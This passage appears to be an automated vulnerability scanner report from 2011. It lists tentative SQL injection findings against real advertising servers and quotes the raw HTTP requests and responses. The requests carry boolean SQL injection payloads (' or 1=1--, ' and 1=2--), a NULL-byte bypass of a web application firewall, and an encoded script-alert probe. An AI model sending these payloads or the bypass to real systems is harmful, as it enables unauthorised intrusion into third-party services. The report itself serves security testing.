Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7gqneUfJTY27Ndaz6AaC55SGDpyLwYICoN-GtBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBXmh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-YAoIGwAIEyAL264oOqAMB6APdBegDpgPoA5sE9QMCAADEgAaI9ZrRq8yS2vkB%26num%3D1%26sig%3DAGiWqtw7c8Tc5DaxrY1WfTDVIyVygQSXPQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHeQANXY0K2hnW4MUzgkvhkmlLmS-_BY7o8A&_nv=1&_CDbg=17764029&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAL0ODwEAAAAAqxsPAQAAAAC2Gw8BAAAAAL8bDwEAAAAAwBsPAQAAAAAy-txBAAAAAAAA-D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSGVRQU5YWTBLMmhuVzRNVXpnZz09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAAAAAAAAAAAA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAhAAAAAAAAADEwNjNiYmUwOTllYTY0OGMuYW5vbnltb3VzLmdvb2dsZQwAAAAAAAAAXl4xNzU2MTI5MjgyAwAAAAAAAAA3MzMGAAAAOwAAAAAAAAAAAAAAAAAAAAB6R8lNAAAAAA==
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:18:24 GMT
Content-Length: 4592

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-- This code was autogenerated @ Tue Apr 26 17:21:31 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>

<SCRIPT LANGUAGE="JavaScript">

<!--
var clickThroughOverlayApplied = 'false';
var dcallowscriptaccess = 'never';
var plugin = false;
var advurl = 'http://di.casio.com/digital_cameras/TRYX/TRYX?utm_source= x1&utm_medium=display&utm_content=728x90-Casio-Diner&utm_campaign=tryx';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/3178434/728x90-casio-diner.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d1--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/digital_cameras/TRYX/TRYX%3Futm_source%3D+x1%26utm_medium%3Ddisplay%26utm_content%3D728x90-Casio-Diner%26utm_campaign%3Dtryx';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/3178434/728x90-casio-diner.swf';
var dcminversion = '8';
var dccreativeheight = '90';

var clickTag = encodeURIComponent('http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/bd/%2a/c%3B240515919%3B2-0%3B0%3B63412091%3B3454-728/90%3B41891531/41909318/1%3Bu%3D17767350%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d1--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/digital_cameras/TRYX/TRYX%3Futm_source%3D+x1%26utm_medium%3Ddisplay%26utm_content%3D728x90-Casio-Diner%26utm_campaign%3Dtryx');
function checkFlash(v){
var y, x, s="Shockwave", f="Flash", o="object", u="undefined", np=navigator.plugins, nm=navigator.mimeTypes, nmd="application/x-shockwave-flash";
v = Math.max(Math.floor(v) || 0, 6); // check if v is a number and use Flash Player 6 as the minimum player version
if(typeof np!=u&&typeof np[s+" "+f]==o&&(x=np[s+" "+f].description)&&!(typeof nm!=u&&nm[nmd]&&!nm[nmd].enabledPlugin)){
if(v<=x.match(/Sho
...[SNIP]...

Request 2

GET /adi/x1.rtb/casio/cttech;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d2--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=;u=17767350;ord=1300754? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7gqneUfJTY27Ndaz6AaC55SGDpyLwYICoN-GtBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBXmh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-YAoIGwAIEyAL264oOqAMB6APdBegDpgPoA5sE9QMCAADEgAaI9ZrRq8yS2vkB%26num%3D1%26sig%3DAGiWqtw7c8Tc5DaxrY1WfTDVIyVygQSXPQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHeQANXY0K2hnW4MUzgkvhkmlLmS-_BY7o8A&_nv=1&_CDbg=17764029&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAL0ODwEAAAAAqxsPAQAAAAC2Gw8BAAAAAL8bDwEAAAAAwBsPAQAAAAAy-txBAAAAAAAA-D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSGVRQU5YWTBLMmhuVzRNVXpnZz09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAAAAAAAAAAAA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAhAAAAAAAAADEwNjNiYmUwOTllYTY0OGMuYW5vbnltb3VzLmdvb2dsZQwAAAAAAAAAXl4xNzU2MTI5MjgyAwAAAAAAAAA3MzMGAAAAOwAAAAAAAAAAAAAAAAAAAAB6R8lNAAAAAA==
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:18:25 GMT
Content-Length: 4497

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-- This code was autogenerated @ Wed May 04 17:51:39 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>

<SCRIPT LANGUAGE="JavaScript">

<!--
var clickThroughOverlayApplied = 'false';
var dcallowscriptaccess = 'never';
var plugin = false;
var advurl = 'http://di.casio.com/tryx?utm_source=x+1&utm_medium=display&utm_content=728x90-casioflip-flash&utm_campaign=tryx';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/3178434/Casio-728x90.gif';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d2--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/tryx%3Futm_source%3Dx%2B1%26utm_medium%3Ddisplay%26utm_content%3D728x90-casioflip-flash%26utm_campaign%3Dtryx';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/3178434/Casio-728x90.swf';
var dcminversion = '9';
var dccreativeheight = '90';

var clickTag = encodeURIComponent('http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/bd/%2a/s%3B240515919%3B0-0%3B0%3B63412091%3B3454-728/90%3B42028567/42046354/1%3Bu%3D17767350%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d2--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/tryx%3Futm_source%3Dx%2B1%26utm_medium%3Ddisplay%26utm_content%3D728x90-casioflip-flash%26utm_campaign%3Dtryx');
function checkFlash(v){
var y, x, s="Shockwave", f="Flash", o="object", u="undefined", np=navigator.plugins, nm=navigator.mimeTypes, nmd="application/x-shockwave-flash";
v = Math.max(Math.floor(v) || 0, 6); // check if v is a number and use Flash Player 6 as the minimum player version
if(typeof np!=u&&typeof np[s+" "+f]==o&&(x=np[s+" "+f].description)&&!(typeof nm!=u&&nm[nmd]&&!nm[nmd].enabledPlugin)){
if(v<=x.match(/Shockwave Flash (\d+)/)[1])return true;}
else if(typeof windo
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/casio/cttech

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/x1.rtb/casio/cttech;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=;u=17767350;ord=1300754?&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7gqneUfJTY27Ndaz6AaC55SGDpyLwYICoN-GtBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBXmh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-YAoIGwAIEyAL264oOqAMB6APdBegDpgPoA5sE9QMCAADEgAaI9ZrRq8yS2vkB%26num%3D1%26sig%3DAGiWqtw7c8Tc5DaxrY1WfTDVIyVygQSXPQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHeQANXY0K2hnW4MUzgkvhkmlLmS-_BY7o8A&_nv=1&_CDbg=17764029&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAL0ODwEAAAAAqxsPAQAAAAC2Gw8BAAAAAL8bDwEAAAAAwBsPAQAAAAAy-txBAAAAAAAA-D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSGVRQU5YWTBLMmhuVzRNVXpnZz09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAAAAAAAAAAAA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAhAAAAAAAAADEwNjNiYmUwOTllYTY0OGMuYW5vbnltb3VzLmdvb2dsZQwAAAAAAAAAXl4xNzU2MTI5MjgyAwAAAAAAAAA3MzMGAAAAOwAAAAAAAAAAAAAAAAAAAAB6R8lNAAAAAA==
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:24:20 GMT
Content-Length: 4501

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-- This code was autogenerated @ Tue Apr 26 17:20:08 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>

<SCRIPT LANGUAGE="JavaScript">

<!--
var clickThroughOverlayApplied = 'false';
var dcallowscriptaccess = 'never';
var plugin = false;
var advurl = 'http://di.casio.com/digital_cameras/TRYX/TRYX?utm_source= x1&utm_medium=display&utm_content=728x90-Casio-Dartboard&utm_campaign=tryx';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/3178434/728x90-casio-dart.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/digital_cameras/TRYX/TRYX%3Futm_source%3D+x1%26utm_medium%3Ddisplay%26utm_content%3D728x90-Casio-Dartboard%26utm_campaign%3Dtryx';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/3178434/728x90-casio-dart.swf';
var dcminversion = '8';
var dccreativeheight = '90';

var clickTag = encodeURIComponent('http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/a2/%2a/r%3B240515919%3B1-0%3B0%3B63412091%3B3454-728/90%3B41891502/41909289/1%3Bu%3D17767350%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/digital_cameras/TRYX/TRYX%3Futm_source%3D+x1%26utm_medium%3Ddisplay%26utm_content%3D728x90-Casio-Dartboard%26utm_campaign%3Dtryx');
function checkFlash(v){
var y, x, s="Shockwave", f="Flash", o="object", u="undefined", np=navigator.plugins, nm=navigator.mimeTypes, nmd="application/x-shockwave-flash";
v = Math.max(Math.floor(v) || 0, 6); // check if v is a number and use Flash Player 6 as the minimum player version
if(typeof np!=u&&typeof np[s+" "+f]==o&&(x=np[s+" "+f].description)&&!(typeof nm!=u&&nm[nmd]&&!nm[nmd].enabledPlugin)){
if(v<=x.match(/Shockwave Flash (\d+)/)[1])return true;}
else
...[SNIP]...

Request 2

GET /adi/x1.rtb/casio/cttech;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=;u=17767350;ord=1300754?&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7gqneUfJTY27Ndaz6AaC55SGDpyLwYICoN-GtBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBXmh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-YAoIGwAIEyAL264oOqAMB6APdBegDpgPoA5sE9QMCAADEgAaI9ZrRq8yS2vkB%26num%3D1%26sig%3DAGiWqtw7c8Tc5DaxrY1WfTDVIyVygQSXPQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHeQANXY0K2hnW4MUzgkvhkmlLmS-_BY7o8A&_nv=1&_CDbg=17764029&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAL0ODwEAAAAAqxsPAQAAAAC2Gw8BAAAAAL8bDwEAAAAAwBsPAQAAAAAy-txBAAAAAAAA-D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSGVRQU5YWTBLMmhuVzRNVXpnZz09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAAAAAAAAAAAA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAhAAAAAAAAADEwNjNiYmUwOTllYTY0OGMuYW5vbnltb3VzLmdvb2dsZQwAAAAAAAAAXl4xNzU2MTI5MjgyAwAAAAAAAAA3MzMGAAAAOwAAAAAAAAAAAAAAAAAAAAB6R8lNAAAAAA==
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:24:21 GMT
Content-Length: 4389

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-- This code was autogenerated @ Wed May 04 17:51:39 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>

<SCRIPT LANGUAGE="JavaScript">

<!--
var clickThroughOverlayApplied = 'false';
var dcallowscriptaccess = 'never';
var plugin = false;
var advurl = 'http://di.casio.com/tryx?utm_source=x+1&utm_medium=display&utm_content=728x90-casioflip-flash&utm_campaign=tryx';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/3178434/Casio-728x90.gif';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/tryx%3Futm_source%3Dx%2B1%26utm_medium%3Ddisplay%26utm_content%3D728x90-casioflip-flash%26utm_campaign%3Dtryx';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/3178434/Casio-728x90.swf';
var dcminversion = '9';
var dccreativeheight = '90';

var clickTag = encodeURIComponent('http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/a2/%2a/s%3B240515919%3B0-0%3B0%3B63412091%3B3454-728/90%3B42028567/42046354/1%3Bu%3D17767350%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/tryx%3Futm_source%3Dx%2B1%26utm_medium%3Ddisplay%26utm_content%3D728x90-casioflip-flash%26utm_campaign%3Dtryx');
function checkFlash(v){
var y, x, s="Shockwave", f="Flash", o="object", u="undefined", np=navigator.plugins, nm=navigator.mimeTypes, nmd="application/x-shockwave-flash";
v = Math.max(Math.floor(v) || 0, 6); // check if v is a number and use Flash Player 6 as the minimum player version
if(typeof np!=u&&typeof np[s+" "+f]==o&&(x=np[s+" "+f].description)&&!(typeof nm!=u&&nm[nmd]&&!nm[nmd].enabledPlugin)){
if(v<=x.match(/Shockwave Flash (\d+)/)[1])return true;}
else if(typeof window.ActiveXObject!=u){
for(y=16;y>=v;y--){
try{x=new A
...[SNIP]...

1.7. http://ads2.adbrite.com/v0/ad [zs parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /v0/ad?sid=1548716&zs=3330305f323530%00'&ifr=1&ref=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F&zx=65&zy=5550&ww=1066&wh=967&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcYxaeOzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFbkoMgFET3wrcfPKJY2Y1EI0Qe8kgsDdl7gBmndH4Pp%2Bt2F2%2FwwuD6BtOwLsb1HlyBW6R6RmSVpzSiCKsMfAYz7Qu4cd6OFnavBOUYVMSRVV4ITbLFYIlF9JhgdnU94TqMP09DcnFfWUu2JZGWOJkIqnfvbk7eTtWJejlImQgLi4k0Noz8ifpfXDZibS6Z9vApj%2B35nOD24KdJ3Byhn0jIlrIalUkXZdIkp4wuNW3f%2FobLcVGfW2LvUmxe71rHLiIUtv3MgLPJ4XiIN%2FR2jIMKsE7rwYnyKeDz%2BQI%3D"; vsd=0@1@4dc81431@load.exelator.com

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 10 May 2011 13:19:37 GMT
Content-Length: 0

Request 2

GET /v0/ad?sid=1548716&zs=3330305f323530%00''&ifr=1&ref=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F&zx=65&zy=5550&ww=1066&wh=967&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcYxaeOzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; 